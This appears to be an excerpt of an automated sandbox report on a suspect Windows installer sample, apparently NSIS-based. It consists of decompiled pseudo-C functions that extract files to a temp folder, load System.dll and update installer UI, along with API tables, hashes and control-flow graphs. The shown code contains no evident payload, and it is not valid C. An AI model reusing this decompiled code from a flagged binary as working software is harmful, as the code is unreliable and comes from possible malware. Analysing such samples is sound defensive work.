                                  				signed int _t72;
                                  				FILETIME* _t73;
                                  				FILETIME* _t77;
                                  				signed int _t79;
                                  				WCHAR* _t81;
                                  				void* _t83;
                                  				void* _t84;
                                  				void* _t86;
                                  
                                  				_t77 = __ebx;
                                  				 *(_t86 - 8) = E00402DA6(0x31);
                                  				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                  				_t35 = E00405E83( *(_t86 - 8));
                                  				_push( *(_t86 - 8));
                                  				_t81 = L"Call";
                                  				if(_t35 == 0) {
                                  					lstrcatW(E00405E0C(E0040653D(_t81, L"C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                                  				} else {
                                  					E0040653D();
                                  				}
                                  				E004067C4(_t81);
                                  				while(1) {
                                  					__eflags =  *(_t86 + 8) - 3;
                                  					if( *(_t86 + 8) >= 3) {
                                  						_t66 = E00406873(_t81);
                                  						_t79 = 0;
                                  						__eflags = _t66 - _t77;
                                  						if(_t66 != _t77) {
                                  							_t73 = _t66 + 0x14;
                                  							__eflags = _t73;
                                  							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                  						}
                                  						asm("sbb eax, eax");
                                  						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                  						__eflags = _t72;
                                  						 *(_t86 + 8) = _t72;
                                  					}
                                  					__eflags =  *(_t86 + 8) - _t77;
                                  					if( *(_t86 + 8) == _t77) {
                                  						E00406008(_t81);
                                  					}
                                  					__eflags =  *(_t86 + 8) - 1;
                                  					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                  					__eflags = _t43 - 0xffffffff;
                                  					 *(_t86 - 0x38) = _t43;
                                  					if(_t43 != 0xffffffff) {
                                  						break;
                                  					}
                                  					__eflags =  *(_t86 + 8) - _t77;
                                  					if( *(_t86 + 8) != _t77) {
                                  						E0040559F(0xffffffe2,  *(_t86 - 8));
                                  						__eflags =  *(_t86 + 8) - 2;
                                  						if(__eflags == 0) {
                                  							 *((intOrPtr*)(_t86 - 4)) = 1;
                                  						}
                                  						L31:
                                  						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                                  						__eflags =  *0x434f88;
                                  						goto L32;
                                  					} else {
                                  						E0040653D("C:\Users\jones\AppData\Local\Temp\nsw2F33.tmp", _t83);
                                  						E0040653D(_t83, _t81);
                                  						E0040657A(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp\nsw2F33.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                  						E0040653D(_t83, "C:\Users\jones\AppData\Local\Temp\nsw2F33.tmp");
                                  						_t64 = E00405B9D("C:\Users\jones\AppData\Local\Temp\nsw2F33.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                  						__eflags = _t64;
                                  						if(_t64 == 0) {
                                  							continue;
                                  						} else {
                                  							__eflags = _t64 == 1;
                                  							if(_t64 == 1) {
                                  								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                                  								L32:
                                  								_t51 = 0;
                                  								__eflags = 0;
                                  							} else {
                                  								_push(_t81);
                                  								_push(0xfffffffa);
                                  								E0040559F();
                                  								L29:
                                  								_t51 = 0x7fffffff;
                                  							}
                                  						}
                                  					}
                                  					L33:
                                  					return _t51;
                                  				}
                                  				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
                                  				 *0x434fb4 =  *0x434fb4 + 1;
                                  				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                  				 *0x434fb4 =  *0x434fb4 - 1;
                                  				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                  				_t84 = _t45;
                                  				if( *(_t86 - 0x24) != 0xffffffff) {
                                  					L22:
                                  					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                  				} else {
                                  					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                  					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                  						goto L22;
                                  					}
                                  				}
                                  				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                  				__eflags = _t84 - _t77;
                                  				if(_t84 >= _t77) {
                                  					goto L31;
                                  				} else {
                                  					__eflags = _t84 - 0xfffffffe;
                                  					if(_t84 != 0xfffffffe) {
                                  						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                                  					} else {
                                  						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                                  						lstrcatW(_t81,  *(_t86 - 8));
                                  					}
                                  					_push(0x200010);
                                  					_push(_t81);
                                  					E00405B9D();
                                  					goto L29;
                                  				}
                                  				goto L33;
                                  			}


















                                  0x0040176f
                                  0x00401776
                                  0x00401782
                                  0x00401785
                                  0x0040178a
                                  0x0040178d
                                  0x00401794
                                  0x004017b0
                                  0x00401796
                                  0x00401797
                                  0x00401797
                                  0x004017b6
                                  0x004017bb
                                  0x004017bb
                                  0x004017bf
                                  0x004017c2
                                  0x004017c7
                                  0x004017c9
                                  0x004017cb
                                  0x004017d0
                                  0x004017d0
                                  0x004017db
                                  0x004017db
                                  0x004017ec
                                  0x004017ee
                                  0x004017ee
                                  0x004017ef
                                  0x004017ef
                                  0x004017f2
                                  0x004017f5
                                  0x004017f8
                                  0x004017f8
                                  0x004017ff
                                  0x0040180e
                                  0x00401813
                                  0x00401816
                                  0x00401819
                                  0x00000000
                                  0x00000000
                                  0x0040181b
                                  0x0040181e
                                  0x00401874
                                  0x00401879
                                  0x004015b6
                                  0x0040292e
                                  0x0040292e
                                  0x00402c2a
                                  0x00402c2d
                                  0x00402c2d
                                  0x00000000
                                  0x00401820
                                  0x00401826
                                  0x0040182d
                                  0x0040183a
                                  0x00401845
                                  0x0040185b
                                  0x0040185b
                                  0x0040185e
                                  0x00000000
                                  0x00401864
                                  0x00401864
                                  0x00401865
                                  0x00401882
                                  0x00402c33
                                  0x00402c33
                                  0x00402c33
                                  0x00401867
                                  0x00401867
                                  0x00401868
                                  0x00401493
                                  0x0040239d
                                  0x0040239d
                                  0x0040239d
                                  0x00401865
                                  0x0040185e
                                  0x00402c35
                                  0x00402c39
                                  0x00402c39
                                  0x00401892
                                  0x00401897
                                  0x004018a5
                                  0x004018aa
                                  0x004018b0
                                  0x004018b4
                                  0x004018b6
                                  0x004018be
                                  0x004018ca
                                  0x004018b8
                                  0x004018b8
                                  0x004018bc
                                  0x00000000
                                  0x00000000
                                  0x004018bc
                                  0x004018d3
                                  0x004018d9
                                  0x004018db
                                  0x00000000
                                  0x004018e1
                                  0x004018e1
                                  0x004018e4
                                  0x004018fc
                                  0x004018e6
                                  0x004018e9
                                  0x004018f2
                                  0x004018f2
                                  0x00401901
                                  0x00401906
                                  0x00402398
                                  0x00000000
                                  0x00402398
                                  0x00000000

                                  APIs
                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                    • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                    • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,00403418), ref: 004055FA
                                    • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll), ref: 0040560C
                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                  • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsw2F33.tmp$C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll$Call
                                  • API String ID: 1941528284-153259113
                                  • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                  • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                  • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                  • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 635 40559f-4055b4 636 4055ba-4055cb 635->636 637 40566b-40566f 635->637 638 4055d6-4055e2 lstrlenW 636->638 639 4055cd-4055d1 call 40657a 636->639 641 4055e4-4055f4 lstrlenW 638->641 642 4055ff-405603 638->642 639->638 641->637 643 4055f6-4055fa lstrcatW 641->643 644 405612-405616 642->644 645 405605-40560c SetWindowTextW 642->645 643->642 646 405618-40565a SendMessageW * 3 644->646 647 40565c-40565e 644->647 645->644 646->647 647->637 648 405660-405663 647->648 648->637
                                  C-Code - Quality: 100%
                                  			E0040559F(signed int _a4, WCHAR* _a8) {
                                  				struct HWND__* _v8;
                                  				signed int _v12;
                                  				WCHAR* _v32;
                                  				long _v44;
                                  				int _v48;
                                  				void* _v52;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				WCHAR* _t27;
                                  				signed int _t28;
                                  				long _t29;
                                  				signed int _t37;
                                  				signed int _t38;
                                  
                                  				_t27 =  *0x433ee4; // 0x103e8
                                  				_v8 = _t27;
                                  				if(_t27 != 0) {
                                  					_t37 =  *0x434fb4;
                                  					_v12 = _t37;
                                  					_t38 = _t37 & 0x00000001;
                                  					if(_t38 == 0) {
                                  						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
                                  					}
                                  					_t27 = lstrlenW(0x42c248);
                                  					_a4 = _t27;
                                  					if(_a8 == 0) {
                                  						L6:
                                  						if((_v12 & 0x00000004) == 0) {
                                  							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
                                  						}
                                  						if((_v12 & 0x00000002) == 0) {
                                  							_v32 = 0x42c248;
                                  							_v52 = 1;
                                  							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
                                  							_v44 = 0;
                                  							_v48 = _t29 - _t38;
                                  							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
                                  							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
                                  						}
                                  						if(_t38 != 0) {
                                  							_t28 = _a4;
                                  							0x42c248[_t28] = 0;
                                  							return _t28;
                                  						}
                                  					} else {
                                  						_t27 = lstrlenW(_a8) + _a4;
                                  						if(_t27 < 0x1000) {
                                  							_t27 = lstrcatW(0x42c248, _a8);
                                  							goto L6;
                                  						}
                                  					}
                                  				}
                                  				return _t27;
                                  			}

















                                  0x004055a5
                                  0x004055af
                                  0x004055b4
                                  0x004055ba
                                  0x004055c5
                                  0x004055c8
                                  0x004055cb
                                  0x004055d1
                                  0x004055d1
                                  0x004055d7
                                  0x004055df
                                  0x004055e2
                                  0x004055ff
                                  0x00405603
                                  0x0040560c
                                  0x0040560c
                                  0x00405616
                                  0x0040561f
                                  0x0040562b
                                  0x00405632
                                  0x00405636
                                  0x00405639
                                  0x0040564c
                                  0x0040565a
                                  0x0040565a
                                  0x0040565e
                                  0x00405660
                                  0x00405663
                                  0x00000000
                                  0x00405663
                                  0x004055e4
                                  0x004055ec
                                  0x004055f4
                                  0x004055fa
                                  0x00000000
                                  0x004055fa
                                  0x004055f4
                                  0x004055e2
                                  0x0040566f

                                  APIs
                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                  • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,00403418), ref: 004055FA
                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll), ref: 0040560C
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                    • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                    • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll,00000000), ref: 00406779
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp\System.dll
                                  • API String ID: 1495540970-4015081731
                                  • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                  • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                  • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                  • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 649 4026ec-402705 call 402d84 652 402c2a-402c2d 649->652 653 40270b-402712 649->653 656 402c33-402c39 652->656 654 402714 653->654 655 402717-40271a 653->655 654->655 657 402720-40272f call 40649d 655->657 658 40287e-402886 655->658 657->658 662 402735 657->662 658->652 663 40273b-40273f 662->663 664 4027d4-4027d7 663->664 665 402745-402760 ReadFile 663->665 667 4027d9-4027dc 664->667 668 4027ef-4027ff call 4060b0 664->668 665->658 666 402766-40276b 665->666 666->658 670 402771-40277f 666->670 667->668 671 4027de-4027e9 call 40610e 667->671 668->658 676 402801 668->676 673 402785-402797 MultiByteToWideChar 670->673 674 40283a-402846 call 406484 670->674 671->658 671->668 673->676 677 402799-40279c 673->677 674->656 680 402804-402807 676->680 681 40279e-4027a9 677->681 680->674 683 402809-40280e 680->683 681->680 684 4027ab-4027d0 SetFilePointer MultiByteToWideChar 681->684 685 402810-402815 683->685 686 40284b-40284f 683->686 684->681 687 4027d2 684->687 685->686 688 402817-40282a 685->688 689 402851-402855 686->689 690 40286c-402878 SetFilePointer 686->690 687->676 688->658 691 40282c-402832 688->691 692 402857-40285b 689->692 693 40285d-40286a 689->693 690->658 691->663 694 402838 691->694 692->690 692->693 693->658 694->658
                                  C-Code - Quality: 87%
                                  			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                  				intOrPtr _t65;
                                  				intOrPtr _t66;
                                  				intOrPtr _t72;
                                  				void* _t76;
                                  				void* _t79;
                                  
                                  				_t72 = __edx;
                                  				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                  				_t65 = 2;
                                  				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                  				_t66 = E00402D84(_t65);
                                  				_t79 = _t66 - 1;
                                  				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                  				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                  				if(_t79 < 0) {
                                  					L36:
                                  					 *0x434f88 =  *0x434f88 +  *(_t76 - 4);
                                  				} else {
                                  					__ecx = 0x3ff;
                                  					if(__eax > 0x3ff) {
                                  						 *(__ebp - 0x44) = 0x3ff;
                                  					}
                                  					if( *__edi == __bx) {
                                  						L34:
                                  						__ecx =  *(__ebp - 0xc);
                                  						__eax =  *(__ebp - 8);
                                  						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                  						if(_t79 == 0) {
                                  							 *(_t76 - 4) = 1;
                                  						}
                                  						goto L36;
                                  					} else {
                                  						 *(__ebp - 0x38) = __ebx;
                                  						 *(__ebp - 0x18) = E0040649D(__ecx, __edi);
                                  						if( *(__ebp - 0x44) > __ebx) {
                                  							do {
                                  								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                  									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040610E( *(__ebp - 0x18), __ebx) >= 0) {
                                  										__eax = __ebp - 0x50;
                                  										if(E004060B0( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                  											goto L34;
                                  										} else {
                                  											goto L21;
                                  										}
                                  									} else {
                                  										goto L34;
                                  									}
                                  								} else {
                                  									__eax = __ebp - 0x40;
                                  									_push(__ebx);
                                  									_push(__ebp - 0x40);
                                  									__eax = 2;
                                  									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                  									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
                                  									if(__eax == 0) {
                                  										goto L34;
                                  									} else {
                                  										__ecx =  *(__ebp - 0x40);
                                  										if(__ecx == __ebx) {
                                  											goto L34;
                                  										} else {
                                  											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                  											 *(__ebp - 0x4c) = __ecx;
                                  											 *(__ebp - 0x50) = __eax;
                                  											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                  												L28:
                                  												__ax & 0x0000ffff = E00406484( *(__ebp - 0xc), __ax & 0x0000ffff);
                                  											} else {
                                  												__ebp - 0x50 = __ebp + 0xa;
                                  												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                  													L21:
                                  													__eax =  *(__ebp - 0x50);
                                  												} else {
                                  													__edi =  *(__ebp - 0x4c);
                                  													__edi =  ~( *(__ebp - 0x4c));
                                  													while(1) {
                                  														_t22 = __ebp - 0x40;
                                  														 *_t22 =  *(__ebp - 0x40) - 1;
                                  														__eax = 0xfffd;
                                  														 *(__ebp - 0x50) = 0xfffd;
                                  														if( *_t22 == 0) {
                                  															goto L22;
                                  														}
                                  														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                  														__edi = __edi + 1;
                                  														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
                                  														__ebp - 0x50 = __ebp + 0xa;
                                  														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                  															continue;
                                  														} else {
                                  															goto L21;
                                  														}
                                  														goto L22;
                                  													}
                                  												}
                                  												L22:
                                  												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                  													goto L28;
                                  												} else {
                                  													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                  														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                  															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                  															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                  														} else {
                                  															__ecx =  *(__ebp - 0xc);
                                  															__edx =  *(__ebp - 8);
                                  															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                  															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                  														}
                                  														goto L34;
                                  													} else {
                                  														__ecx =  *(__ebp - 0xc);
                                  														__edx =  *(__ebp - 8);
                                  														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                  														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                  														 *(__ebp - 0x38) = __eax;
                                  														if(__ax == __bx) {
                                  															goto L34;
                                  														} else {
                                  															goto L26;
                                  														}
                                  													}
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  								goto L37;
                                  								L26:
                                  								__eax =  *(__ebp - 8);
                                  							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                  						}
                                  						goto L34;
                                  					}
                                  				}
                                  				L37:
                                  				return 0;
                                  			}








                                  0x004026ec
                                  0x004026ee
                                  0x004026f1
                                  0x004026f3
                                  0x004026f6
                                  0x004026fb
                                  0x004026ff
                                  0x00402702
                                  0x00402705
                                  0x00402c2a
                                  0x00402c2d
                                  0x0040270b
                                  0x0040270b
                                  0x00402712
                                  0x00402714
                                  0x00402714
                                  0x0040271a
                                  0x0040287e
                                  0x0040287e
                                  0x00402881
                                  0x00402886
                                  0x004015b6
                                  0x0040292e
                                  0x0040292e
                                  0x00000000
                                  0x00402720
                                  0x00402721
                                  0x0040272c
                                  0x0040272f
                                  0x0040273b
                                  0x0040273f
                                  0x004027d7
                                  0x004027ef
                                  0x004027ff
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402745
                                  0x00402745
                                  0x00402748
                                  0x00402749
                                  0x0040274c
                                  0x00402751
                                  0x00402758
                                  0x00402760
                                  0x00000000
                                  0x00402766
                                  0x00402766
                                  0x0040276b
                                  0x00000000
                                  0x00402771
                                  0x00402771
                                  0x00402779
                                  0x0040277c
                                  0x0040277f
                                  0x0040283a
                                  0x00402841
                                  0x00402785
                                  0x0040278b
                                  0x00402797
                                  0x00402801
                                  0x00402801
                                  0x00402799
                                  0x00402799
                                  0x0040279c
                                  0x0040279e
                                  0x0040279e
                                  0x0040279e
                                  0x004027a1
                                  0x004027a6
                                  0x004027a9
                                  0x00000000
                                  0x00000000
                                  0x004027ab
                                  0x004027ae
                                  0x004027b6
                                  0x004027c2
                                  0x004027d0
                                  0x00000000
                                  0x004027d2
                                  0x00000000
                                  0x004027d2
                                  0x00000000
                                  0x004027d0
                                  0x0040279e
                                  0x00402804
                                  0x00402807
                                  0x00000000
                                  0x00402809
                                  0x0040280e
                                  0x0040284f
                                  0x00402871
                                  0x00402878
                                  0x0040285d
                                  0x0040285d
                                  0x00402860
                                  0x00402863
                                  0x00402866
                                  0x00402866
                                  0x00000000
                                  0x00402817
                                  0x00402817
                                  0x0040281a
                                  0x0040281d
                                  0x00402823
                                  0x00402827
                                  0x0040282a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040282a
                                  0x0040280e
                                  0x00402807
                                  0x0040277f
                                  0x0040276b
                                  0x00402760
                                  0x00000000
                                  0x0040282c
                                  0x0040282c
                                  0x0040282f
                                  0x00402838
                                  0x00000000
                                  0x0040272f
                                  0x0040271a
                                  0x00402c33
                                  0x00402c39

                                  APIs
                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 00402758
                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                    • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                  • String ID: 9
                                  • API String ID: 163830602-2366072709
                                  • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                  • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                  • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                  • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 695 40689a-4068ba GetSystemDirectoryW 696 4068bc 695->696 697 4068be-4068c0 695->697 696->697 698 4068d1-4068d3 697->698 699 4068c2-4068cb 697->699 701 4068d4-406907 wsprintfW LoadLibraryExW 698->701 699->698 700 4068cd-4068cf 699->700 700->701
                                  C-Code - Quality: 100%
                                  			E0040689A(intOrPtr _a4) {
                                  				short _v576;
                                  				signed int _t13;
                                  				struct HINSTANCE__* _t17;
                                  				signed int _t19;
                                  				void* _t24;
                                  
                                  				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                  				if(_t13 > 0x104) {
                                  					_t13 = 0;
                                  				}
                                  				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                  					_t19 = 1;
                                  				} else {
                                  					_t19 = 0;
                                  				}
                                  				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                  				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
